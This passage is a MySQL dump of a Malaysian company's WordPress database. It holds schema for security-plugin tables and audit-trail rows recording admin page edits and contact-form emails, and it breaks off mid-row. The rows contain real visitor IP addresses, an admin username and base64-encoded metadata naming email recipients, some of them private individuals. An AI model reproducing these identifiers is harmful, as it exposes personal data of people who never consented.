-- MySQL dump 10.13  Distrib 5.5.62, for Linux (x86_64)
--
-- Host: localhost    Database: norfaiz_wp527
-- ------------------------------------------------------
-- Server version	5.5.62-cll

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wpdp_aiowps_events`
--

DROP TABLE IF EXISTS `wpdp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `username` varchar(150) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `referer_info` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `url` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country_code` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `event_data` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_aiowps_events`
--

LOCK TABLES `wpdp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wpdp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wpdp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-00 10:00:00',
  `login_attempt_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_aiowps_failed_logins`
--

LOCK TABLES `wpdp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wpdp_aiowps_failed_logins` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wpdp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key3` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key4` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_key5` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value2` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value3` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value4` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value5` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_aiowps_global_meta`
--

LOCK TABLES `wpdp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wpdp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wpdp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-00 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-00 10:00:00',
  `login_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `login_country` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `browser_type` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_aiowps_login_activity`
--

LOCK TABLES `wpdp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wpdp_aiowps_login_activity` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wpdp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_ci NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `lock_reason` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `unlock_key` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_aiowps_login_lockdown`
--

LOCK TABLES `wpdp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wpdp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wpdp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `block_reason` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `country_origin` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_aiowps_permanent_block`
--

LOCK TABLES `wpdp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wpdp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_blog_versions`
--

DROP TABLE IF EXISTS `wpdp_blog_versions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_blog_versions` (
  `blog_id` bigint(20) NOT NULL DEFAULT '0',
  `db_version` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `last_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`blog_id`),
  KEY `db_version` (`db_version`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_blog_versions`
--

LOCK TABLES `wpdp_blog_versions` WRITE;
/*!40000 ALTER TABLE `wpdp_blog_versions` DISABLE KEYS */;
INSERT INTO `wpdp_blog_versions` (`blog_id`, `db_version`, `last_updated`) VALUES (1,'44719','2019-03-08 14:44:53');
/*!40000 ALTER TABLE `wpdp_blog_versions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_blogmeta`
--

DROP TABLE IF EXISTS `wpdp_blogmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_blogmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `blog_id` bigint(20) NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `blog_id` (`blog_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_blogmeta`
--

LOCK TABLES `wpdp_blogmeta` WRITE;
/*!40000 ALTER TABLE `wpdp_blogmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_blogmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_blogs`
--

DROP TABLE IF EXISTS `wpdp_blogs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_blogs` (
  `blog_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `site_id` bigint(20) NOT NULL DEFAULT '0',
  `domain` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `public` tinyint(2) NOT NULL DEFAULT '1',
  `archived` tinyint(2) NOT NULL DEFAULT '0',
  `mature` tinyint(2) NOT NULL DEFAULT '0',
  `spam` tinyint(2) NOT NULL DEFAULT '0',
  `deleted` tinyint(2) NOT NULL DEFAULT '0',
  `lang_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`blog_id`),
  KEY `domain` (`domain`(50),`path`(5)),
  KEY `lang_id` (`lang_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_blogs`
--

LOCK TABLES `wpdp_blogs` WRITE;
/*!40000 ALTER TABLE `wpdp_blogs` DISABLE KEYS */;
INSERT INTO `wpdp_blogs` (`blog_id`, `site_id`, `domain`, `path`, `registered`, `last_updated`, `public`, `archived`, `mature`, `spam`, `deleted`, `lang_id`) VALUES (1,1,'bintara.com.my','/','2018-12-11 00:50:30','2019-11-06 06:13:48',1,0,0,0,0,0);
/*!40000 ALTER TABLE `wpdp_blogs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_commentmeta`
--

DROP TABLE IF EXISTS `wpdp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_commentmeta`
--

LOCK TABLES `wpdp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpdp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_comments`
--

DROP TABLE IF EXISTS `wpdp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_comments`
--

LOCK TABLES `wpdp_comments` WRITE;
/*!40000 ALTER TABLE `wpdp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_icwp_wpsf_audit_trail`
--

DROP TABLE IF EXISTS `wpdp_icwp_wpsf_audit_trail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_icwp_wpsf_audit_trail` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `rid` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Request ID',
  `ip` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0' COMMENT 'Visitor IP Address',
  `wp_username` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '-' COMMENT 'WP User',
  `context` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'none' COMMENT 'Audit Context',
  `event` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'none' COMMENT 'Specific Audit Event',
  `category` int(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Severity',
  `message` text COLLATE utf8mb4_unicode_ci COMMENT 'Audit Event Description',
  `meta` text COLLATE utf8mb4_unicode_ci COMMENT 'Audit Event Data',
  `immutable` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT 'May Be Deleted',
  `created_at` int(15) unsigned NOT NULL DEFAULT '0',
  `deleted_at` int(15) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=871 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_icwp_wpsf_audit_trail`
--

LOCK TABLES `wpdp_icwp_wpsf_audit_trail` WRITE;
/*!40000 ALTER TABLE `wpdp_icwp_wpsf_audit_trail` DISABLE KEYS */;
INSERT INTO `wpdp_icwp_wpsf_audit_trail` (`id`, `rid`, `ip`, `wp_username`, `context`, `event`, `category`, `message`, `meta`, `immutable`, `created_at`, `deleted_at`) VALUES (789,'72f71d0194','202.168.66.190','-','emails','email_attempt_send',1,'','eyJ0byI6Im1hbmliYXJ0aHkuY2hpbmFuYXBhbkBuMndjb3JwLmNvbSIsInN1YmplY3QiOiJDb250YWN0ICBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1572839927,0),(786,'7b0c70e531','175.139.143.105','-','emails','email_attempt_send',1,'','eyJ0byI6InJ1aGFpemlAYXhpcy10ZWsuY29tIiwic3ViamVjdCI6IkdldCBRdW90YXRpb24gKExvZ2l0ZWNoKSIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1572837861,0),(787,'72f71d0194','202.168.66.190','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1572839927,0),(799,'ab3d517823','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572924587,0),(801,'fe21270703','203.116.87.162','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoTG9naXRlY2gpIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQxNn0=',0,1572925831,0),(800,'ab3d517823','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572924587,0),(831,'d838b597c8','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020808,0),(832,'d838b597c8','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020808,0),(833,'d838b597c8','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020808,0),(827,'1334f50a47','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020135,0),(828,'27a8bdf1cb','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020551,0),(822,'0561f76739','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573015063,0),(823,'0561f76739','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573015063,0),(824,'0561f76739','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573015063,0),(829,'27a8bdf1cb','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020551,0),(830,'27a8bdf1cb','115.132.145.182','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1573020551,0),(854,'6c4867b1a9','113.210.192.239','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoUEFOQVNPTklDIFRPVUdIQk9PSykiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDE2fQ==',0,1573614749,0),(855,'6c4867b1a9','113.210.192.239','-','emails','email_attempt_send',1,'','eyJ0byI6ImNocmlzY2hvd3NzQGdtYWlsLmNvbSIsInN1YmplY3QiOiJHZXQgUXVvdGF0aW9uIChQQU5BU09OSUMgVE9VR0hCT09LKSIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1573614749,0),(814,'cfcfb1e30d','121.122.86.26','-','emails','email_attempt_send',1,'','eyJ0byI6ImNodW5raXQubG9oQHNwLWlubm8uY29tIiwic3ViamVjdCI6IkdldCBRdW90YXRpb24gKExvZ2l0ZWNoKSIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MzN9',0,1572941820,0),(816,'57b6141e02','45.126.255.67','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1572954582,0),(808,'612887ce2e','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IkdldCBRdW90YXRpb24gKFRhcmd1cykiLCJ0eXBlIjoicGFnZSJ9',0,1572926462,0),(809,'69b621e09a','175.138.214.59','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoUEFOQVNPTklDIFRPVUdIQk9PSykiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDE2fQ==',0,1572931513,0),(820,'e9517dd430','175.144.36.207','-','emails','email_attempt_send',1,'','eyJ0byI6ImFhcm9uQHNpbmRvaC5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCAgVXMiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDMzfQ==',0,1573001370,0),(817,'57b6141e02','45.126.255.67','-','emails','email_attempt_send',1,'','eyJ0byI6InNoYXJvbi44OXBAZ21haWwuY29tIiwic3ViamVjdCI6IkNvbnRhY3QgIFVzIiwiY2MiOiItIiwiYmNjIjoiLSIsImJ0X2ZpbGUiOiJ3cC1jb250ZW50XC9wbHVnaW5zXC92aXN1YWwtZm9ybS1idWlsZGVyXC9wdWJsaWNcL2NsYXNzLWVtYWlsLnBocCIsImJ0X2xpbmUiOjQzM30=',0,1572954582,0),(837,'c5ac890886','42.153.150.237','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573088437,0),(838,'c5ac890886','42.153.150.237','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573088437,0),(853,'6c4867b1a9','113.210.192.239','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiR2V0IFF1b3RhdGlvbiAoUEFOQVNPTklDIFRPVUdIQk9PSykiLCJjYyI6Ii0iLCJiY2MiOiItIiwiYnRfZmlsZSI6IndwLWNvbnRlbnRcL3BsdWdpbnNcL3Zpc3VhbC1mb3JtLWJ1aWxkZXJcL3B1YmxpY1wvY2xhc3MtZW1haWwucGhwIiwiYnRfbGluZSI6NDE2fQ==',0,1573614749,0),(868,'42fe212652','60.50.64.32','-','emails','email_attempt_send',1,'','eyJ0byI6ImZhaXpAYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLCJidF9saW5lIjo0MTZ9',0,1573695007,0),(796,'9015c865fc','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572919693,0),(795,'9015c865fc','175.142.115.248','pentadbirweb','posts','post_updated',1,'','eyJ0aXRsZSI6IlRhcmd1cyIsInR5cGUiOiJwYWdlIn0=',0,1572919693,0),(819,'e9517dd430','175.144.36.207','-','emails','email_attempt_send',1,'','eyJ0byI6ImluZm9AYmludGFyYS5jb20ubXkiLCJzdWJqZWN0IjoiQ29udGFjdCBVcyIsImNjIjoiLSIsImJjYyI6Ii0iLCJidF9maWxlIjoid3AtY29udGVudFwvcGx1Z2luc1wvdmlzdWFsLWZvcm0tYnVpbGRlclwvcHVibGljXC9jbGFzcy1lbWFpbC5waHAiLC